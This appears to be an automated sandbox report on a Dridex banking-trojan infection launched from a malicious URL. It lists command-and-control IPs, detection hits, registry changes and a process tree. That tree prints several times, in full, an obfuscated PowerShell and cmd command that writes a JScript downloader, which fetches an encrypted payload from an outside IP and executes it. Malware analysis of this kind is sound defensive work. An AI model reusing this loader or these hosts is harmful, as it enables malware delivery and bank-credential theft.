dridex | hxxps://anklexit[.]online/twDGMjtfsacfa3e

Analysis

max time kernel
108s
max time network
133s
platform
windows7_x64
resource
win7v20201028
submitted
11-02-2021 12:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://anklexit.online/twDGMjtfsacfa3e
Sample

210211-emqetwfxbe

Score

10^/10

dridex 10111 botnet cryptone discovery evasion loader packer trojan

Malware Config

Extracted

Family

dridex

Botnet

10111

188.165.17.91:8443

185.216.27.185:8172

182.254.209.230:6516

rc4.plain

Signatures

Dridex
Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.
botnet dridex

CryptOne packer 8 IoCs

Detects CryptOne packer defined in NCC blogpost.

cryptone packer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\0hurp.exe	cryptone
\Users\Admin\AppData\Local\Temp\0hurp.exe	cryptone
C:\Users\Admin\AppData\Local\Temp\0hurp.exe	cryptone
\Users\Admin\AppData\Local\Temp\0hurp.exe	cryptone
C:\Users\Admin\AppData\Local\Temp\0hurp.exe	cryptone
\Users\Admin\AppData\Local\Temp\0hurp.exe	cryptone
\Users\Admin\AppData\Local\Temp\0hurp.exe	cryptone
C:\Users\Admin\AppData\Local\Temp\0hurp.exe	cryptone

Dridex Loader 2 IoCs

Detects Dridex both x86 and x64 loader in memory.

botnet loader

Processes:

resource	yara_rule
behavioral1/memory/1440-76-0x0000000000400000-0x000000000043D000-memory.dmp	dridex_ldr
behavioral1/memory/1440-79-0x0000000000400000-0x000000000043D000-memory.dmp	dridex_ldr

Blocklisted process makes network request 2 IoCs

Processes:

wscript.exewscript.exe

flow pid process

19 1372 wscript.exe
20 1596 wscript.exe
Executes dropped EXE 2 IoCs

Processes:

0hurp.exe0hurp.exe

pid process

1440 0hurp.exe
1552 0hurp.exe
Loads dropped DLL 4 IoCs

Processes:

cmd.execmd.exe

pid process

852 cmd.exe
852 cmd.exe
1900 cmd.exe
1900 cmd.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

flow	pid	process
19	1372	wscript.exe
20	1596	wscript.exe

pid	process
1440	0hurp.exe
1552	0hurp.exe

pid	process
852	cmd.exe
852	cmd.exe
1900	cmd.exe
1900	cmd.exe

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

0hurp.exe0hurp.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	0hurp.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	0hurp.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 36 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "319813161"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 209416697500d701	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{8CF146C1-6C68-11EB-8853-EAC4A56BD8AE} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c3bb49a99606f54594c5659159d81b2900000000020000000000106600000001000020000000807732d2bf22b2fd19c8a235a186e5cf437d1beedb16556b330f2188bc873d22000000000e800000000200002000000067bc0f7b32ddc7972bbe576f4734ffc9c364e004b639f50d263b308c4647697d200000005a8375c99d63a3f78ba5efced5dc00a3c570618b516fd54acff19e6e0507d4f4400000003a2199bc8af2503c11cba76c6f8a688227d1a5a2f74f2d702122b4cee30e99ed025680dbd54623c9ed35c3a500073e6cf27938f1350ecea6b153ef57a4f512d3	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c3bb49a99606f54594c5659159d81b2900000000020000000000106600000001000020000000c0ebde30d6ea4b6486473be89d9511c4131c446e9dfa76fcadc670db2358fc50000000000e80000000020000200000006b7d31dcea6be0feaa7cd3584197abb13e8a0f501f7a7a29ff8ac7e0582c94c4900000002ce75af8b7701dc5f3c38687e0b1f3b04f6aa2d0a312bdfccafa546999740f8394c7a1cedd6e0f4934bbff65bb3f03ffa21b8b3c022ab2c5e927738428520c7a0b1648d7897eb9e24632c64dfbd83e613ccbb61796c8bf781657d9ad0224da8e106675bf59d59a613aa074fbd390dc7f82f52267210c221550c51b1bc6ad5ac546086996ca967e13c98c5bfe5e0c15134000000095a0aa3edf19f5d36ca499d621d50f11712a5ba3fb025275f3783d5f5a42a77678873504fa48b49f5c06cddda6c047c41007e65b30cff70ab892bbbd13ea98bf	iexplore.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

PowerShell.exePowerShell.exe

pid process

968 PowerShell.exe
968 PowerShell.exe
856 PowerShell.exe
856 PowerShell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

PowerShell.exePowerShell.exe

description pid process

Token: SeDebugPrivilege 968 PowerShell.exe
Token: SeDebugPrivilege 856 PowerShell.exe
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

iexplore.exe

pid process

1888 iexplore.exe

pid	process
968	PowerShell.exe
968	PowerShell.exe
856	PowerShell.exe
856	PowerShell.exe

description	pid	process
Token: SeDebugPrivilege	968	PowerShell.exe
Token: SeDebugPrivilege	856	PowerShell.exe

Suspicious use of SetWindowsHookEx 10 IoCs

Processes:

iexplore.exeIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXE

pid	process
1888	iexplore.exe
1888	iexplore.exe
1760	IEXPLORE.EXE
1760	IEXPLORE.EXE
808	IEXPLORE.EXE
808	IEXPLORE.EXE
836	IEXPLORE.EXE
836	IEXPLORE.EXE
836	IEXPLORE.EXE
836	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 52 IoCs

Processes:

iexplore.exeIEXPLORE.EXEIEXPLORE.EXEPowerShell.execmd.exePowerShell.execmd.exewscript.exewscript.execmd.execmd.exe

description	pid	process	target process
PID 1888 wrote to memory of 1760	1888	iexplore.exe	IEXPLORE.EXE
PID 1888 wrote to memory of 1760	1888	iexplore.exe	IEXPLORE.EXE
PID 1888 wrote to memory of 1760	1888	iexplore.exe	IEXPLORE.EXE
PID 1888 wrote to memory of 1760	1888	iexplore.exe	IEXPLORE.EXE
PID 1760 wrote to memory of 968	1760	IEXPLORE.EXE	PowerShell.exe
PID 1760 wrote to memory of 968	1760	IEXPLORE.EXE	PowerShell.exe
PID 1760 wrote to memory of 968	1760	IEXPLORE.EXE	PowerShell.exe
PID 1760 wrote to memory of 968	1760	IEXPLORE.EXE	PowerShell.exe
PID 1888 wrote to memory of 808	1888	iexplore.exe	IEXPLORE.EXE
PID 1888 wrote to memory of 808	1888	iexplore.exe	IEXPLORE.EXE
PID 1888 wrote to memory of 808	1888	iexplore.exe	IEXPLORE.EXE
PID 1888 wrote to memory of 808	1888	iexplore.exe	IEXPLORE.EXE
PID 808 wrote to memory of 856	808	IEXPLORE.EXE	PowerShell.exe
PID 808 wrote to memory of 856	808	IEXPLORE.EXE	PowerShell.exe
PID 808 wrote to memory of 856	808	IEXPLORE.EXE	PowerShell.exe
PID 808 wrote to memory of 856	808	IEXPLORE.EXE	PowerShell.exe
PID 1888 wrote to memory of 836	1888	iexplore.exe	IEXPLORE.EXE
PID 1888 wrote to memory of 836	1888	iexplore.exe	IEXPLORE.EXE
PID 1888 wrote to memory of 836	1888	iexplore.exe	IEXPLORE.EXE
PID 1888 wrote to memory of 836	1888	iexplore.exe	IEXPLORE.EXE
PID 968 wrote to memory of 1608	968	PowerShell.exe	cmd.exe
PID 968 wrote to memory of 1608	968	PowerShell.exe	cmd.exe
PID 968 wrote to memory of 1608	968	PowerShell.exe	cmd.exe
PID 968 wrote to memory of 1608	968	PowerShell.exe	cmd.exe
PID 1608 wrote to memory of 1372	1608	cmd.exe	wscript.exe
PID 1608 wrote to memory of 1372	1608	cmd.exe	wscript.exe
PID 1608 wrote to memory of 1372	1608	cmd.exe	wscript.exe
PID 1608 wrote to memory of 1372	1608	cmd.exe	wscript.exe
PID 856 wrote to memory of 1504	856	PowerShell.exe	cmd.exe
PID 856 wrote to memory of 1504	856	PowerShell.exe	cmd.exe
PID 856 wrote to memory of 1504	856	PowerShell.exe	cmd.exe
PID 856 wrote to memory of 1504	856	PowerShell.exe	cmd.exe
PID 1504 wrote to memory of 1596	1504	cmd.exe	wscript.exe
PID 1504 wrote to memory of 1596	1504	cmd.exe	wscript.exe
PID 1504 wrote to memory of 1596	1504	cmd.exe	wscript.exe
PID 1504 wrote to memory of 1596	1504	cmd.exe	wscript.exe
PID 1372 wrote to memory of 852	1372	wscript.exe	cmd.exe
PID 1372 wrote to memory of 852	1372	wscript.exe	cmd.exe
PID 1372 wrote to memory of 852	1372	wscript.exe	cmd.exe
PID 1372 wrote to memory of 852	1372	wscript.exe	cmd.exe
PID 1596 wrote to memory of 1900	1596	wscript.exe	cmd.exe
PID 1596 wrote to memory of 1900	1596	wscript.exe	cmd.exe
PID 1596 wrote to memory of 1900	1596	wscript.exe	cmd.exe
PID 1596 wrote to memory of 1900	1596	wscript.exe	cmd.exe
PID 852 wrote to memory of 1440	852	cmd.exe	0hurp.exe
PID 852 wrote to memory of 1440	852	cmd.exe	0hurp.exe
PID 852 wrote to memory of 1440	852	cmd.exe	0hurp.exe
PID 852 wrote to memory of 1440	852	cmd.exe	0hurp.exe
PID 1900 wrote to memory of 1552	1900	cmd.exe	0hurp.exe
PID 1900 wrote to memory of 1552	1900	cmd.exe	0hurp.exe
PID 1900 wrote to memory of 1552	1900	cmd.exe	0hurp.exe
PID 1900 wrote to memory of 1552	1900	cmd.exe	0hurp.exe

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://anklexit.online/twDGMjtfsacfa3e
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1888

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1888 CREDAT:275457 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1760

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
((((\..\PowerShell.exe -Command "<#AAAAAAAAAAAAAAAAAAAAAAAAA ((#>$a = ""Start-Process cmd.exe `"""cmd.exe /q /c cd /d "%tMp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.59.226/?MzQ2ODM1^&ymLXNX^&oa1n4=xH3QMrLYbRzFFYHfLfjKRqZbNUv^&s2ht4=RGUKVxo2bk6rPE5qpZDLGpbf1DB6gqVmAH1m-t_d0erZOfQC5zUaweQZpyI1bBF4Qpqr_hkXSzhKZ1JPX9RbYMA4U95aVErVo216nm7JBdMggwhKG7mVQ_OkUVVkV5Q4jwa2LFaX5^&CCEKloFzNDE5OQ== "1"`"""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:968

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" cmd.exe /q /c cd /d %tMp% && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.59.226/?MzQ2ODM1^&ymLXNX^&oa1n4=xH3QMrLYbRzFFYHfLfjKRqZbNUv^&s2ht4=RGUKVxo2bk6rPE5qpZDLGpbf1DB6gqVmAH1m-t_d0erZOfQC5zUaweQZpyI1bBF4Qpqr_hkXSzhKZ1JPX9RbYMA4U95aVErVo216nm7JBdMggwhKG7mVQ_OkUVVkV5Q4jwa2LFaX5^&CCEKloFzNDE5OQ== 1
4⤵
- Suspicious use of WriteProcessMemory
PID:1608

C:\Windows\SysWOW64\wscript.exe
wsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.59.226/?MzQ2ODM1&ymLXNX&oa1n4=xH3QMrLYbRzFFYHfLfjKRqZbNUv&s2ht4=RGUKVxo2bk6rPE5qpZDLGpbf1DB6gqVmAH1m-t_d0erZOfQC5zUaweQZpyI1bBF4Qpqr_hkXSzhKZ1JPX9RbYMA4U95aVErVo216nm7JBdMggwhKG7mVQ_OkUVVkV5Q4jwa2LFaX5&CCEKloFzNDE5OQ== 1
5⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1372

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c 0hurp.exe
6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:852

C:\Users\Admin\AppData\Local\Temp\0hurp.exe
0hurp.exe
7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:1440

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1888 CREDAT:340994 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:808

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
((((\..\PowerShell.exe -Command "<#AAAAAAAAAAAAAAAAAAAAAAAAA ((#>$a = ""Start-Process cmd.exe `"""cmd.exe /q /c cd /d "%tMp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.59.226/?MjkxOTg2^&rOaxYqm^&oa1n4=x3rQcvWYaRuPDojEM_jdTaRBP0vYHliIxY2Y^&s2ht4=mKrVCJ2vfzSj2beIEBjw8VndSTvVgfBOKa1Tbge-iQeELgEOn8xeC1lE9LetzkKNylafsJSA-R2ONQlD_MSWF7Jq3Azxx7ITc8wkwhXW6jRUxO5IUQsTsAkbn67PEKKarkNzBkZmVVjKK5ohpRjGVCTvMjp3sfS5Qzl2nurJ9cd3wZRt1h2o9w^&EFSVCzMTI0NQ== "1"`"""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:856

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" cmd.exe /q /c cd /d %tMp% && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.59.226/?MjkxOTg2^&rOaxYqm^&oa1n4=x3rQcvWYaRuPDojEM_jdTaRBP0vYHliIxY2Y^&s2ht4=mKrVCJ2vfzSj2beIEBjw8VndSTvVgfBOKa1Tbge-iQeELgEOn8xeC1lE9LetzkKNylafsJSA-R2ONQlD_MSWF7Jq3Azxx7ITc8wkwhXW6jRUxO5IUQsTsAkbn67PEKKarkNzBkZmVVjKK5ohpRjGVCTvMjp3sfS5Qzl2nurJ9cd3wZRt1h2o9w^&EFSVCzMTI0NQ== 1
4⤵
- Suspicious use of WriteProcessMemory
PID:1504

C:\Windows\SysWOW64\wscript.exe
wsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.59.226/?MjkxOTg2&rOaxYqm&oa1n4=x3rQcvWYaRuPDojEM_jdTaRBP0vYHliIxY2Y&s2ht4=mKrVCJ2vfzSj2beIEBjw8VndSTvVgfBOKa1Tbge-iQeELgEOn8xeC1lE9LetzkKNylafsJSA-R2ONQlD_MSWF7Jq3Azxx7ITc8wkwhXW6jRUxO5IUQsTsAkbn67PEKKarkNzBkZmVVjKK5ohpRjGVCTvMjp3sfS5Qzl2nurJ9cd3wZRt1h2o9w&EFSVCzMTI0NQ== 1
5⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1596

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c 0hurp.exe
6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1900

C:\Users\Admin\AppData\Local\Temp\0hurp.exe
0hurp.exe
7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:1552

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1888 CREDAT:209934 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:836

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
MD5
e92176b0889cc1bb97114beb2f3c1728

SHA1
ad1459d390ec23ab1c3da73ff2fbec7fa3a7f443

SHA256
58a4f38ba43f115ba3f465c311eaaf67f43d92e580f7f153de3ab605fc9900f3

SHA512
cd2267ba2f08d2f87538f5b4f8d3032638542ac3476863a35f0df491eb3a84458ce36c06e8c1bd84219f5297b6f386748e817945a406082fa8e77244ec229d8f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
15e252c387dff4caeecfb0859b28eeaf

SHA1
2143012ec9da9ea2583797c5084ea1afa8974b2c

SHA256
ee97c66bfd45bb155988e39dda3caf358ca622b901a73da37666b5008cc8f50a

SHA512
7d4cffffb3cb7523e3954ad1d02efdace6c17ceaea44eb1a32a8f27459949cf6dd28d40dde0e1d1e734c81172641ac5d6c81090aff3f0438d85c68017aa626ff

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
f089065988f08fb2a6dae3d0de2ab36c

SHA1
